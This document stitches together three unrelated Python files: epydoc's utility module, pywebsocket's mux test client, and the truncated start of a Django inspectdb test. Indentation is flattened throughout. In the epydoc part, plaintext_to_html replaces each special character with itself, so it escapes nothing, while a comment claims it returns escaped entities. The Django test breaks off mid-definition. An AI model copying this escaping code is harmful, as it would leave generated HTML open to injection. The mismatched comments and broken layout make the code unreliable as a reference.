# Copyright (C) 2005 Edward Loper
# Author: Edward Loper <edloper@loper.org>
# URL: <http://epydoc.sf.net>
#
# $Id: util.py 1721 2008-02-15 01:02:30Z edloper $
"""
Miscellaneous utility functions that are used by multiple modules.
@group Python source types: is_module_file, is_package_dir, is_pyname,
py_src_filename
@group Text processing: wordwrap, decode_with_backslashreplace,
plaintext_to_html
"""
__docformat__ = 'epytext en'
import os, os.path, re, sys
######################################################################
## Python Source Types
######################################################################
PY_SRC_EXTENSIONS = ['.py', '.pyw']
PY_BIN_EXTENSIONS = ['.pyc', '.so', '.pyd']
def is_module_file(path):
# Make sure it's a file name.
if not isinstance(path, basestring):
return False
(dir, filename) = os.path.split(path)
(basename, extension) = os.path.splitext(filename)
return (os.path.isfile(path) and
re.match('[a-zA-Z_]\w*$', basename) and
extension in PY_SRC_EXTENSIONS+PY_BIN_EXTENSIONS)
def is_src_filename(filename):
if not isinstance(filename, basestring): return False
if not os.path.exists(filename): return False
return os.path.splitext(filename)[1] in PY_SRC_EXTENSIONS
def is_package_dir(dirname):
"""
Return true if the given directory is a valid package directory
(i.e., it names a directory that contains a valid __init__ file,
and its name is a valid identifier).
"""
# Make sure it's a directory name.
if not isinstance(dirname, basestring):
return False
if not os.path.isdir(dirname):
return False
dirname = os.path.abspath(dirname)
# Make sure it's a valid identifier. (Special case for
# "foo/", where os.path.split -> ("foo", "").)
(parent, dir) = os.path.split(dirname)
if dir == '': (parent, dir) = os.path.split(parent)
# The following constraint was removed because of sourceforge
# bug #1787028 -- in some cases (eg eggs), it's too strict.
#if not re.match('\w+$', dir):
# return False
for name in os.listdir(dirname):
filename = os.path.join(dirname, name)
if name.startswith('__init__.') and is_module_file(filename):
return True
else:
return False
def is_pyname(name):
return re.match(r"\w+(\.\w+)*$", name)
def py_src_filename(filename):
basefile, extension = os.path.splitext(filename)
if extension in PY_SRC_EXTENSIONS:
return filename
else:
for ext in PY_SRC_EXTENSIONS:
if os.path.isfile('%s%s' % (basefile, ext)):
return '%s%s' % (basefile, ext)
else:
raise ValueError('Could not find a corresponding '
'Python source file for %r.' % filename)
def munge_script_name(filename):
name = os.path.split(filename)[1]
name = re.sub(r'\W', '_', name)
return 'script-'+name
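# e.g. (illustrative): munge_script_name('/usr/bin/my-script.py')
# returns 'script-my_script_py'.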
######################################################################
## Text Processing
######################################################################
def decode_with_backslashreplace(s):
r"""
Convert the given 8-bit string into unicode, treating any
character c such that ord(c)<128 as an ascii character, and
converting any c such that ord(c)>128 into a backslashed escape
sequence.
>>> decode_with_backslashreplace('abc\xff\xe8')
u'abc\\xff\\xe8'
"""
# s.encode('string-escape') is not appropriate here, since it
# also adds backslashes to some ascii chars (eg \ and ').
assert isinstance(s, str)
return (s
.decode('latin1')
.encode('ascii', 'backslashreplace')
.decode('ascii'))
def wordwrap(str, indent=0, right=75, startindex=0, splitchars=''):
"""
Word-wrap the given string. I.e., add newlines to the string such
that any lines that are longer than C{right} are broken into
shorter lines (at the first whitespace sequence that occurs before
index C{right}). If the given string contains newlines, they will
I{not} be removed. Any lines that begin with whitespace will not
be wordwrapped.
@param indent: If specified, then indent each line by this number
of spaces.
@type indent: C{int}
@param right: The right margin for word wrapping. Lines that are
longer than C{right} will be broken at the first whitespace
sequence before the right margin.
@type right: C{int}
@param startindex: If specified, then assume that the first line
        is already preceded by C{startindex} characters.
@type startindex: C{int}
@param splitchars: A list of non-whitespace characters which can
be used to split a line. (E.g., use '/\\' to allow path names
to be split over multiple lines.)
@rtype: C{str}
"""
if splitchars:
chunks = re.split(r'( +|\n|[^ \n%s]*[%s])' %
(re.escape(splitchars), re.escape(splitchars)),
str.expandtabs())
else:
chunks = re.split(r'( +|\n)', str.expandtabs())
result = [' '*(indent-startindex)]
charindex = max(indent, startindex)
for chunknum, chunk in enumerate(chunks):
if (charindex+len(chunk) > right and charindex > 0) or chunk == '\n':
result.append('\n' + ' '*indent)
charindex = indent
if chunk[:1] not in ('\n', ' '):
result.append(chunk)
charindex += len(chunk)
else:
result.append(chunk)
charindex += len(chunk)
return ''.join(result).rstrip()+'\n'
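# e.g. (illustrative): wordwrap('aaa bbb ccc', indent=2, right=8) yields
# three lines, each indented two spaces ('  aaa \n  bbb \n  ccc\n');
# each break happens at the first space before the 8-column margin.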
def plaintext_to_html(s):
"""
@return: An HTML string that encodes the given plaintext string.
In particular, special characters (such as C{'<'} and C{'&'})
are escaped.
@rtype: C{string}
"""
s = s.replace('&', '&').replace('"', '"')
s = s.replace('<', '<').replace('>', '>')
return s
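# e.g. (illustrative): plaintext_to_html('x < y & "z"') returns
# 'x &lt; y &amp; &quot;z&quot;'.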
def plaintext_to_latex(str, nbsp=0, breakany=0):
"""
@return: A LaTeX string that encodes the given plaintext string.
In particular, special characters (such as C{'$'} and C{'_'})
are escaped, and tabs are expanded.
@rtype: C{string}
@param breakany: Insert hyphenation marks, so that LaTeX can
break the resulting string at any point. This is useful for
small boxes (e.g., the type box in the variable list table).
@param nbsp: Replace every space with a non-breaking space
(C{'~'}).
"""
# These get converted to hyphenation points later
if breakany: str = re.sub('(.)', '\\1\1', str)
# These get converted to \textbackslash later.
str = str.replace('\\', '\0')
# Expand tabs
str = str.expandtabs()
# These elements need to be backslashed.
str = re.sub(r'([#$&%_\${}])', r'\\\1', str)
# These elements have special names.
str = str.replace('|', '{\\textbar}')
str = str.replace('<', '{\\textless}')
str = str.replace('>', '{\\textgreater}')
str = str.replace('^', '{\\textasciicircum}')
str = str.replace('~', '{\\textasciitilde}')
str = str.replace('\0', r'{\textbackslash}')
# replace spaces with non-breaking spaces
if nbsp: str = str.replace(' ', '~')
# Convert \1's to hyphenation points.
if breakany: str = str.replace('\1', r'\-')
return str
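# e.g. (illustrative): plaintext_to_latex('50% of $x_1$') returns
# '50\\% of \\$x\\_1\\$' (i.e. 50\% of \$x\_1\$ in the LaTeX source).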
class RunSubprocessError(OSError):
def __init__(self, cmd, out, err):
OSError.__init__(self, '%s failed' % cmd[0])
self.out = out
self.err = err
def run_subprocess(cmd, data=None):
"""
Execute the command C{cmd} in a subprocess.
@param cmd: The command to execute, specified as a list
of string.
@param data: A string containing data to send to the
subprocess.
@return: A tuple C{(out, err)}.
@raise OSError: If there is any problem executing the
command, or if its exitval is not 0.
"""
if isinstance(cmd, basestring):
cmd = cmd.split()
# Under Python 2.4+, use subprocess
try:
from subprocess import Popen, PIPE
pipe = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE)
out, err = pipe.communicate(data)
if hasattr(pipe, 'returncode'):
if pipe.returncode == 0:
return out, err
else:
raise RunSubprocessError(cmd, out, err)
else:
# Assume that there was an error iff anything was written
# to the child's stderr.
if err == '':
return out, err
else:
raise RunSubprocessError(cmd, out, err)
except ImportError:
pass
# Under Python 2.3 or earlier, on unix, use popen2.Popen3 so we
# can access the return value.
import popen2
if hasattr(popen2, 'Popen3'):
pipe = popen2.Popen3(' '.join(cmd), True)
to_child = pipe.tochild
from_child = pipe.fromchild
child_err = pipe.childerr
if data:
to_child.write(data)
to_child.close()
out = err = ''
while pipe.poll() is None:
out += from_child.read()
err += child_err.read()
out += from_child.read()
err += child_err.read()
if pipe.wait() == 0:
return out, err
else:
raise RunSubprocessError(cmd, out, err)
# Under Python 2.3 or earlier, on non-unix, use os.popen3
else:
to_child, from_child, child_err = os.popen3(' '.join(cmd), 'b')
if data:
try:
to_child.write(data)
# Guard for a broken pipe error
except IOError, e:
raise OSError(e)
to_child.close()
out = from_child.read()
err = child_err.read()
# Assume that there was an error iff anything was written
# to the child's stderr.
if err == '':
return out, err
else:
raise RunSubprocessError(cmd, out, err)
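# e.g. (illustrative): out, err = run_subprocess(['epydoc', '--version'])
# raises RunSubprocessError (an OSError subclass) when the command exits
# with a non-zero status.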
######################################################################
## Terminal Control
######################################################################
class TerminalController:
"""
A class that can be used to portably generate formatted output to
a terminal. See
U{http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/475116}
for documentation. (This is a somewhat stripped-down version.)
"""
BOL = '' #: Move the cursor to the beginning of the line
UP = '' #: Move the cursor up one line
DOWN = '' #: Move the cursor down one line
LEFT = '' #: Move the cursor left one char
RIGHT = '' #: Move the cursor right one char
CLEAR_EOL = '' #: Clear to the end of the line.
CLEAR_LINE = '' #: Clear the current line; cursor to BOL.
BOLD = '' #: Turn on bold mode
NORMAL = '' #: Turn off all modes
COLS = 75 #: Width of the terminal (default to 75)
UNDERLINE = '' #: Underline the text
REVERSE = '' #: Reverse the foreground & background
BLACK = BLUE = GREEN = CYAN = RED = MAGENTA = YELLOW = WHITE = ''
_STRING_CAPABILITIES = """
BOL=cr UP=cuu1 DOWN=cud1 LEFT=cub1 RIGHT=cuf1 REVERSE=rev
CLEAR_EOL=el BOLD=bold UNDERLINE=smul NORMAL=sgr0""".split()
_COLORS = """BLACK BLUE GREEN CYAN RED MAGENTA YELLOW WHITE""".split()
_ANSICOLORS = "BLACK RED GREEN YELLOW BLUE MAGENTA CYAN WHITE".split()
#: If this is set to true, then new TerminalControllers will
#: assume that the terminal is not capable of doing manipulation
#: of any kind.
FORCE_SIMPLE_TERM = False
def __init__(self, term_stream=sys.stdout):
# If the stream isn't a tty, then assume it has no capabilities.
if not term_stream.isatty(): return
if self.FORCE_SIMPLE_TERM: return
# Curses isn't available on all platforms
try: import curses
except:
# If it's not available, then try faking enough to get a
# simple progress bar.
self.BOL = '\r'
self.CLEAR_LINE = '\r' + ' '*self.COLS + '\r'
# Check the terminal type. If we fail, then assume that the
# terminal has no capabilities.
try: curses.setupterm()
except: return
# Look up numeric capabilities.
self.COLS = curses.tigetnum('cols')
# Look up string capabilities.
for capability in self._STRING_CAPABILITIES:
(attrib, cap_name) = capability.split('=')
setattr(self, attrib, self._tigetstr(cap_name) or '')
if self.BOL and self.CLEAR_EOL:
self.CLEAR_LINE = self.BOL+self.CLEAR_EOL
# Colors
set_fg = self._tigetstr('setf')
if set_fg:
for i,color in zip(range(len(self._COLORS)), self._COLORS):
setattr(self, color, curses.tparm(set_fg, i) or '')
set_fg_ansi = self._tigetstr('setaf')
if set_fg_ansi:
for i,color in zip(range(len(self._ANSICOLORS)), self._ANSICOLORS):
setattr(self, color, curses.tparm(set_fg_ansi, i) or '')
def _tigetstr(self, cap_name):
# String capabilities can include "delays" of the form "$<2>".
# For any modern terminal, we should be able to just ignore
# these, so strip them out.
import curses
cap = curses.tigetstr(cap_name) or ''
return re.sub(r'\$<\d+>[/*]?', '', cap)
def render(self, template):
"""
        Replace each $-substitution in the given template string with
the corresponding terminal control string (if it's defined) or
'' (if it's not).
"""
return re.sub(r'\$\$|\${\w+}', self._render_sub, template)
def _render_sub(self, match):
s = match.group()
if s == '$$': return s
else: return getattr(self, s[2:-1])
| apache-2.0 |
vks/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/test/mux_client_for_testing.py | 457 | 25761 | #!/usr/bin/env python
#
# Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket client utility for testing mux extension.
This code should be independent from mod_pywebsocket. See the comment of
client_for_testing.py.
NOTE: This code is far from robust, unlike client_for_testing.py.
"""
import Queue
import base64
import collections
import email
import email.parser
import logging
import math
import os
import random
import socket
import struct
import threading
from mod_pywebsocket import util
from test import client_for_testing
_CONTROL_CHANNEL_ID = 0
_DEFAULT_CHANNEL_ID = 1
_MUX_OPCODE_ADD_CHANNEL_REQUEST = 0
_MUX_OPCODE_ADD_CHANNEL_RESPONSE = 1
_MUX_OPCODE_FLOW_CONTROL = 2
_MUX_OPCODE_DROP_CHANNEL = 3
_MUX_OPCODE_NEW_CHANNEL_SLOT = 4
class _ControlBlock:
def __init__(self, opcode):
self.opcode = opcode
def _parse_handshake_response(response):
status_line, header_lines = response.split('\r\n', 1)
words = status_line.split(' ')
if len(words) < 3:
raise ValueError('Bad Status-Line syntax %r' % status_line)
[version, response_code] = words[:2]
if version != 'HTTP/1.1':
raise ValueError('Bad response version %r' % version)
if response_code != '101':
raise ValueError('Bad response code %r ' % response_code)
headers = email.parser.Parser().parsestr(header_lines)
return headers
def _parse_channel_id(data, offset=0):
length = len(data)
remaining = length - offset
if remaining <= 0:
raise Exception('No channel id found')
channel_id = ord(data[offset])
channel_id_length = 1
if channel_id & 0xe0 == 0xe0:
if remaining < 4:
raise Exception('Invalid channel id format')
channel_id = struct.unpack('!L',
data[offset:offset+4])[0] & 0x1fffffff
channel_id_length = 4
elif channel_id & 0xc0 == 0xc0:
if remaining < 3:
raise Exception('Invalid channel id format')
channel_id = (((channel_id & 0x1f) << 16) +
struct.unpack('!H', data[offset+1:offset+3])[0])
channel_id_length = 3
elif channel_id & 0x80 == 0x80:
if remaining < 2:
raise Exception('Invalid channel id format')
channel_id = struct.unpack('!H', data[offset:offset+2])[0] & 0x3fff
channel_id_length = 2
return channel_id, channel_id_length
def _parse_number(data, offset=0):
first_byte = ord(data[offset])
if (first_byte & 0x80) != 0:
raise Exception('The MSB of number field must be unset')
first_byte = first_byte & 0x7f
if first_byte == 127:
if offset + 9 > len(data):
raise Exception('Invalid number')
return struct.unpack('!Q', data[offset+1:offset+9])[0], 9
if first_byte == 126:
if offset + 3 > len(data):
raise Exception('Invalid number')
return struct.unpack('!H', data[offset+1:offset+3])[0], 3
return first_byte, 1
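# Illustrative values (editor's sketch; the format mirrors the WebSocket
# payload-length encoding):
#   _parse_number('\x05')         -> (5, 1)    small value, 1 byte consumed
#   _parse_number('\x7e\x01\x00') -> (256, 3)  16-bit form after the 126 marker
#   _parse_number('\x7f' + '\x00' * 7 + '\x01') -> (1, 9)  64-bit form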
def _parse_size_and_contents(data, offset=0):
size, advance = _parse_number(data, offset)
start_position = offset + advance
end_position = start_position + size
if len(data) < end_position:
raise Exception('Invalid size of control block (%d < %d)' % (
len(data), end_position))
return data[start_position:end_position], size + advance
def _parse_control_blocks(data):
blocks = []
length = len(data)
pos = 0
while pos < length:
first_byte = ord(data[pos])
pos += 1
opcode = (first_byte >> 5) & 0x7
block = _ControlBlock(opcode)
# TODO(bashi): Support more opcode
if opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
block.encode = first_byte & 3
block.rejected = (first_byte >> 4) & 1
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
encoded_handshake, advance = _parse_size_and_contents(data, pos)
block.encoded_handshake = encoded_handshake
pos += advance
blocks.append(block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
block.mux_error = (first_byte >> 4) & 1
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
reason, advance = _parse_size_and_contents(data, pos)
if len(reason) == 0:
block.drop_code = None
block.drop_message = ''
elif len(reason) >= 2:
block.drop_code = struct.unpack('!H', reason[:2])[0]
block.drop_message = reason[2:]
else:
raise Exception('Invalid DropChannel')
pos += advance
blocks.append(block)
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
send_quota, advance = _parse_number(data, pos)
block.send_quota = send_quota
pos += advance
blocks.append(block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
fallback = first_byte & 1
slots, advance = _parse_number(data, pos)
pos += advance
send_quota, advance = _parse_number(data, pos)
pos += advance
if fallback == 1 and (slots != 0 or send_quota != 0):
raise Exception('slots and send_quota must be zero if F bit '
'is set')
block.fallback = fallback
block.slots = slots
block.send_quota = send_quota
blocks.append(block)
else:
raise Exception(
'Unsupported mux opcode %d received' % opcode)
return blocks
def _encode_channel_id(channel_id):
if channel_id < 0:
raise ValueError('Channel id %d must not be negative' % channel_id)
if channel_id < 2 ** 7:
return chr(channel_id)
if channel_id < 2 ** 14:
return struct.pack('!H', 0x8000 + channel_id)
if channel_id < 2 ** 21:
first = chr(0xc0 + (channel_id >> 16))
return first + struct.pack('!H', channel_id & 0xffff)
if channel_id < 2 ** 29:
return struct.pack('!L', 0xe0000000 + channel_id)
raise ValueError('Channel id %d is too large' % channel_id)
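# Illustrative encodings (editor's sketch, derived from the bit layout above;
# not taken from the original test suite):
#   _encode_channel_id(5)     -> '\x05'          (1 byte,  7-bit id)
#   _encode_channel_id(300)   -> '\x81\x2c'      (2 bytes, 14-bit id)
#   _encode_channel_id(70000) -> '\xc1\x11\x70'  (3 bytes, 21-bit id)
# _parse_channel_id() above inverts each of these.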
def _encode_number(number):
if number <= 125:
return chr(number)
elif number < (1 << 16):
return chr(0x7e) + struct.pack('!H', number)
elif number < (1 << 63):
return chr(0x7f) + struct.pack('!Q', number)
else:
raise Exception('Invalid number')
def _create_add_channel_request(channel_id, encoded_handshake,
encoding=0):
length = len(encoded_handshake)
handshake_length = _encode_number(length)
first_byte = (_MUX_OPCODE_ADD_CHANNEL_REQUEST << 5) | encoding
return (chr(first_byte) + _encode_channel_id(channel_id) +
handshake_length + encoded_handshake)
def _create_flow_control(channel_id, replenished_quota):
first_byte = (_MUX_OPCODE_FLOW_CONTROL << 5)
return (chr(first_byte) + _encode_channel_id(channel_id) +
_encode_number(replenished_quota))
class _MuxReaderThread(threading.Thread):
"""Mux reader thread.
Reads frames and passes them to the mux client. This thread accesses
private functions/variables of the mux client.
"""
def __init__(self, mux):
threading.Thread.__init__(self)
self.setDaemon(True)
self._mux = mux
self._stop_requested = False
def _receive_message(self):
first_opcode = None
pending_payload = []
while not self._stop_requested:
fin, rsv1, rsv2, rsv3, opcode, payload_length = (
client_for_testing.read_frame_header(self._mux._socket))
if not first_opcode:
if opcode == client_for_testing.OPCODE_TEXT:
raise Exception('Received a text message on physical '
'connection')
if opcode == client_for_testing.OPCODE_CONTINUATION:
raise Exception('Received an intermediate frame but '
'fragmentation was not started')
if (opcode == client_for_testing.OPCODE_BINARY or
                    opcode == client_for_testing.OPCODE_PING or
opcode == client_for_testing.OPCODE_PONG or
opcode == client_for_testing.OPCODE_CLOSE):
first_opcode = opcode
else:
raise Exception('Received an undefined opcode frame: %d' %
opcode)
elif opcode != client_for_testing.OPCODE_CONTINUATION:
raise Exception('Received a new opcode before '
'terminating fragmentation')
payload = client_for_testing.receive_bytes(
self._mux._socket, payload_length)
if self._mux._incoming_frame_filter is not None:
payload = self._mux._incoming_frame_filter.filter(payload)
pending_payload.append(payload)
if fin:
break
if self._stop_requested:
return None, None
message = ''.join(pending_payload)
return first_opcode, message
def request_stop(self):
self._stop_requested = True
def run(self):
try:
while not self._stop_requested:
                # opcode is OPCODE_BINARY or a control opcode when a message
                # is successfully received.
opcode, message = self._receive_message()
if not opcode:
return
if opcode == client_for_testing.OPCODE_BINARY:
channel_id, advance = _parse_channel_id(message)
self._mux._dispatch_frame(channel_id, message[advance:])
else:
self._mux._process_control_message(opcode, message)
finally:
self._mux._notify_reader_done()
class _InnerFrame(object):
def __init__(self, fin, rsv1, rsv2, rsv3, opcode, payload):
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.payload = payload
class _LogicalChannelData(object):
def __init__(self):
self.queue = Queue.Queue()
self.send_quota = 0
self.receive_quota = 0
class MuxClient(object):
"""WebSocket mux client.
Note that this class is NOT thread-safe. Do not access an instance of this
    class from multiple threads at the same time.
"""
def __init__(self, options):
self._logger = util.get_class_logger(self)
self._options = options
self._options.enable_mux()
self._stream = None
self._socket = None
self._handshake = client_for_testing.WebSocketHandshake(self._options)
self._incoming_frame_filter = None
self._outgoing_frame_filter = None
self._is_active = False
self._read_thread = None
self._control_blocks_condition = threading.Condition()
self._control_blocks = []
self._channel_slots = collections.deque()
        self._logical_channels_condition = threading.Condition()
self._logical_channels = {}
self._timeout = 2
self._physical_connection_close_event = None
self._physical_connection_close_message = None
def _parse_inner_frame(self, data):
if len(data) == 0:
raise Exception('Invalid encapsulated frame received')
first_byte = ord(data[0])
        fin = (first_byte >> 7) & 1
        rsv1 = (first_byte >> 6) & 1
        rsv2 = (first_byte >> 5) & 1
        rsv3 = (first_byte >> 4) & 1
opcode = first_byte & 0xf
if self._outgoing_frame_filter:
payload = self._outgoing_frame_filter.filter(
data[1:])
else:
payload = data[1:]
return _InnerFrame(fin, rsv1, rsv2, rsv3, opcode, payload)
def _process_mux_control_blocks(self):
for block in self._control_blocks:
if block.opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
# AddChannelResponse will be handled in add_channel().
continue
elif block.opcode == _MUX_OPCODE_FLOW_CONTROL:
try:
self._logical_channels_condition.acquire()
if not block.channel_id in self._logical_channels:
raise Exception('Invalid flow control received for '
'channel id %d' % block.channel_id)
self._logical_channels[block.channel_id].send_quota += (
block.send_quota)
self._logical_channels_condition.notify()
finally:
self._logical_channels_condition.release()
elif block.opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
self._channel_slots.extend([block.send_quota] * block.slots)
def _dispatch_frame(self, channel_id, payload):
if channel_id == _CONTROL_CHANNEL_ID:
try:
self._control_blocks_condition.acquire()
self._control_blocks += _parse_control_blocks(payload)
self._process_mux_control_blocks()
self._control_blocks_condition.notify()
finally:
self._control_blocks_condition.release()
else:
try:
self._logical_channels_condition.acquire()
if not channel_id in self._logical_channels:
raise Exception('Received logical frame on channel id '
'%d, which is not established' %
channel_id)
inner_frame = self._parse_inner_frame(payload)
self._logical_channels[channel_id].receive_quota -= (
len(inner_frame.payload))
if self._logical_channels[channel_id].receive_quota < 0:
raise Exception('The server violates quota on '
'channel id %d' % channel_id)
finally:
self._logical_channels_condition.release()
self._logical_channels[channel_id].queue.put(inner_frame)
def _process_control_message(self, opcode, message):
# Ping/Pong are not supported.
if opcode == client_for_testing.OPCODE_CLOSE:
self._physical_connection_close_message = message
if self._is_active:
self._stream.send_close(
code=client_for_testing.STATUS_NORMAL_CLOSURE, reason='')
self._read_thread.request_stop()
if self._physical_connection_close_event:
self._physical_connection_close_event.set()
def _notify_reader_done(self):
self._logger.debug('Read thread terminated.')
self.close_socket()
def _assert_channel_slot_available(self):
try:
self._control_blocks_condition.acquire()
if len(self._channel_slots) == 0:
# Wait once
self._control_blocks_condition.wait(timeout=self._timeout)
finally:
self._control_blocks_condition.release()
if len(self._channel_slots) == 0:
raise Exception('Failed to receive NewChannelSlot')
def _assert_send_quota_available(self, channel_id):
try:
self._logical_channels_condition.acquire()
if self._logical_channels[channel_id].send_quota == 0:
# Wait once
self._logical_channels_condition.wait(timeout=self._timeout)
finally:
self._logical_channels_condition.release()
if self._logical_channels[channel_id].send_quota == 0:
raise Exception('Failed to receive FlowControl for channel id %d' %
channel_id)
def connect(self):
self._socket = client_for_testing.connect_socket_with_retry(
self._options.server_host,
self._options.server_port,
self._options.socket_timeout,
self._options.use_tls)
self._handshake.handshake(self._socket)
self._stream = client_for_testing.WebSocketStream(
self._socket, self._handshake)
self._logical_channels[_DEFAULT_CHANNEL_ID] = _LogicalChannelData()
self._read_thread = _MuxReaderThread(self)
self._read_thread.start()
self._assert_channel_slot_available()
self._assert_send_quota_available(_DEFAULT_CHANNEL_ID)
self._is_active = True
self._logger.info('Connection established')
def add_channel(self, channel_id, options):
if not self._is_active:
raise Exception('Mux client is not active')
if channel_id in self._logical_channels:
raise Exception('Channel id %d already exists' % channel_id)
try:
send_quota = self._channel_slots.popleft()
except IndexError, e:
raise Exception('No channel slots: %r' % e)
# Create AddChannel request
request_line = 'GET %s HTTP/1.1\r\n' % options.resource
fields = []
if options.server_port == client_for_testing.DEFAULT_PORT:
fields.append('Host: %s\r\n' % options.server_host.lower())
else:
fields.append('Host: %s:%d\r\n' % (options.server_host.lower(),
options.server_port))
fields.append('Origin: %s\r\n' % options.origin.lower())
fields.append('Connection: Upgrade\r\n')
if len(options.extensions) > 0:
fields.append('Sec-WebSocket-Extensions: %s\r\n' %
', '.join(options.extensions))
handshake = request_line + ''.join(fields) + '\r\n'
add_channel_request = _create_add_channel_request(
channel_id, handshake)
payload = _encode_channel_id(_CONTROL_CHANNEL_ID) + add_channel_request
self._stream.send_binary(payload)
# Wait AddChannelResponse
self._logger.debug('Waiting AddChannelResponse for the request...')
response = None
try:
self._control_blocks_condition.acquire()
while True:
for block in self._control_blocks:
if block.opcode != _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
continue
if block.channel_id == channel_id:
response = block
self._control_blocks.remove(response)
break
if response:
break
self._control_blocks_condition.wait(self._timeout)
if not self._is_active:
raise Exception('AddChannelRequest timed out')
finally:
self._control_blocks_condition.release()
# Validate AddChannelResponse
if response.rejected:
raise Exception('The server rejected AddChannelRequest')
fields = _parse_handshake_response(response.encoded_handshake)
# Should we reject when Upgrade, Connection, or Sec-WebSocket-Accept
# headers exist?
self._logical_channels_condition.acquire()
self._logical_channels[channel_id] = _LogicalChannelData()
self._logical_channels[channel_id].send_quota = send_quota
self._logical_channels_condition.release()
self._logger.debug('Logical channel %d established' % channel_id)
def _check_logical_channel_is_opened(self, channel_id):
if not self._is_active:
raise Exception('Mux client is not active')
if not channel_id in self._logical_channels:
            raise Exception('Logical channel %d is not established.' % channel_id)
def drop_channel(self, channel_id):
# TODO(bashi): Implement
pass
def send_flow_control(self, channel_id, replenished_quota):
self._check_logical_channel_is_opened(channel_id)
flow_control = _create_flow_control(channel_id, replenished_quota)
payload = _encode_channel_id(_CONTROL_CHANNEL_ID) + flow_control
# Replenish receive quota
try:
self._logical_channels_condition.acquire()
self._logical_channels[channel_id].receive_quota += (
replenished_quota)
finally:
self._logical_channels_condition.release()
self._stream.send_binary(payload)
def send_message(self, channel_id, message, end=True, binary=False):
self._check_logical_channel_is_opened(channel_id)
if binary:
first_byte = (end << 7) | client_for_testing.OPCODE_BINARY
else:
first_byte = (end << 7) | client_for_testing.OPCODE_TEXT
message = message.encode('utf-8')
try:
self._logical_channels_condition.acquire()
if self._logical_channels[channel_id].send_quota < len(message):
raise Exception('Send quota violation: %d < %d' % (
self._logical_channels[channel_id].send_quota,
len(message)))
self._logical_channels[channel_id].send_quota -= len(message)
finally:
self._logical_channels_condition.release()
payload = _encode_channel_id(channel_id) + chr(first_byte) + message
self._stream.send_binary(payload)
def assert_receive(self, channel_id, payload, binary=False):
self._check_logical_channel_is_opened(channel_id)
try:
inner_frame = self._logical_channels[channel_id].queue.get(
timeout=self._timeout)
except Queue.Empty, e:
raise Exception('Cannot receive message from channel id %d' %
channel_id)
if binary:
opcode = client_for_testing.OPCODE_BINARY
else:
opcode = client_for_testing.OPCODE_TEXT
if inner_frame.opcode != opcode:
            raise Exception('Unexpected opcode received (%r != %r)' %
                            (opcode, inner_frame.opcode))
if inner_frame.payload != payload:
raise Exception('Unexpected payload received')
def send_close(self, channel_id, code=None, reason=''):
self._check_logical_channel_is_opened(channel_id)
if code is not None:
body = struct.pack('!H', code) + reason.encode('utf-8')
else:
body = ''
first_byte = (1 << 7) | client_for_testing.OPCODE_CLOSE
payload = _encode_channel_id(channel_id) + chr(first_byte) + body
self._stream.send_binary(payload)
def assert_receive_close(self, channel_id):
self._check_logical_channel_is_opened(channel_id)
try:
inner_frame = self._logical_channels[channel_id].queue.get(
timeout=self._timeout)
except Queue.Empty, e:
raise Exception('Cannot receive message from channel id %d' %
channel_id)
if inner_frame.opcode != client_for_testing.OPCODE_CLOSE:
raise Exception('Didn\'t receive close frame')
def send_physical_connection_close(self, code=None, reason=''):
self._physical_connection_close_event = threading.Event()
self._stream.send_close(code, reason)
# This method can be used only after calling
# send_physical_connection_close().
def assert_physical_connection_receive_close(
self, code=client_for_testing.STATUS_NORMAL_CLOSURE, reason=''):
self._physical_connection_close_event.wait(timeout=self._timeout)
if (not self._physical_connection_close_event.isSet() or
not self._physical_connection_close_message):
raise Exception('Didn\'t receive closing handshake')
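# Typical call ordering (illustrative): the closing handshake is initiated
# and then awaited, e.g.
#   client.send_physical_connection_close(
#       code=client_for_testing.STATUS_NORMAL_CLOSURE)
#   client.assert_physical_connection_receive_close()
# Calling the assert method first would fail on an event attribute that has
# not been created yet, which is why the comment above restricts the order.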
def close_socket(self):
self._is_active = False
self._socket.close()
| mpl-2.0 |
shaistaansari/django | tests/inspectdb/tests.py | 89 | 12808 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import re
from unittest import skipUnless
from django.core.management import call_command
from django.db import connection
from django.test import TestCase, skipUnlessDBFeature
from django.utils.six import PY3, StringIO
from .models import ColumnTypes
class InspectDBTestCase(TestCase):
def test_stealth_table_name_filter_option(self):
